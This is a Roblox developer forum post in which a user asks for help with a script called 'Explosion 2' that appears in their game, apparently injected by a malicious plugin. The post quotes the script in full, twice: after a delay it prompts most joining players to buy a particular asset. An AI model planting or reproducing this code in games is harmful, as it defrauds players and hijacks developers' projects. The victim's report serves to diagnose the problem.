Hi!
Yesterday, i made a test place to test the Behavior Trees Editor. (The V2.0 and V3.0)
But, when I run the game, a script called Explosion 2 gets add in the ServerScriptService! I already checked my plugins and removed some of them by a creator I didn´t know.
Here´s the script that gets added (code starts at line 1013 in the script in my place. I made it short here):
Full Script:
local Market = game:GetService("MarketplaceService")
if not game:GetService("RunService"):IsStudio() then
wait (750)
if #game.Players:GetPlayers() >= 3 then
game:GetService("Players").PlayerAdded:connect(function(plr)
if plr.UserId ~= game.CreatorId and not Market:PromptPurchase(plr,4368448936) then
Market:PromptPurchase(plr,4368448936)
end
end)
end
end
local Market = game:GetService("MarketplaceService")
if not game:GetService("RunService"):IsStudio() then
wait (750)
if #game.Players:GetPlayers() >= 3 then
game:GetService("Players").PlayerAdded:connect(function(plr)
if plr.UserId ~= game.CreatorId and not Market:PromptPurchase(plr,4368448936) then
Market:PromptPurchase(plr,4368448936)
end
end)
end
end
Am I the only one with this problem and the script?
I made my Inventory visible for anybody. I already looked through the Plugins but found nothing conspicuous.(Plugins, by groups with famous creator names. for example sleitnick)
Can you give me some tips what to do or you had the problem to and tell me the answer?
Thank you very much!